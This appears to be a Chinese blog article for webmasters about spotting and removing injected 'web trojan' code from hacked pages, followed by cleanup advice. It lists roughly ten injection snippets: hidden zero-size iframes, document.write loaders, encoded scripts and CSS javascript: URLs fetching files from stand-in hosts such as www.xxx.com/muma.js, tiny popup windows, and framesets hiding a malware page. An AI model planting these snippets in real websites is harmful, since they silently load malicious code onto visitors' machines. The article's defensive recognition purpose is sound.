站点挂马是所有站长很头疼的一件事。黑客通过各种途径来获取网站管理员的账号和密码然后在页面中加入一些恶意的转向代码,且危害大家也都知道获取用户一些密码之类的,不多说,直接来说下如何简单认识一些恶意代码及怎么清理掉。

<iframe src=地址 width=0 height=0></iframe>

document.write("<iframe width='0' height='0' src='地址'></iframe>");

保存为xxx.js,

则JS挂马代码为

<script language=javascript src=xxx.js></script>

3,js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀

4,body挂马

<body></body>

5,隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

6,css中挂马

body {

background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

7,JAJA挂马

<SCRIPT language=javascript>

window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

</script>

8,图片伪装

<html>

<iframe src="网马地址" height=0 width=0></iframe>

<img src="图片地址"></center>

</html>

9,伪装调用

<frameset rows="444,0" cols="*">

<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

</frameset>

10,高级欺骗

<a href="http://www.XXX.com(迷惑连接地址,显示这个地址指向木马地址)"> 页面要显示的内容 </a>

<SCRIPT Language="JavaScript">

function www_XXX_com ()

{

var url="网马地址";

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no, scrollbars=no,resizable=no,copyhistory=yes,width=800, height=600,left=10,top=10");

}

</SCRIPT>

以上就是一些可能经常出现的例子,如何查找呢,咱可以用Search and Replace这个工具来搜索替换掉;再者如果你还是怕运用这个的话,可以去护卫神的官网下载个护卫神云查杀,自动查杀出被挂马的文件并可以自动帮你清理掉。

虽然说这是可行的方法,但最终的方法还是得靠各位站长去修复下网站上的漏洞,安全维护最重要!

03-15 22:43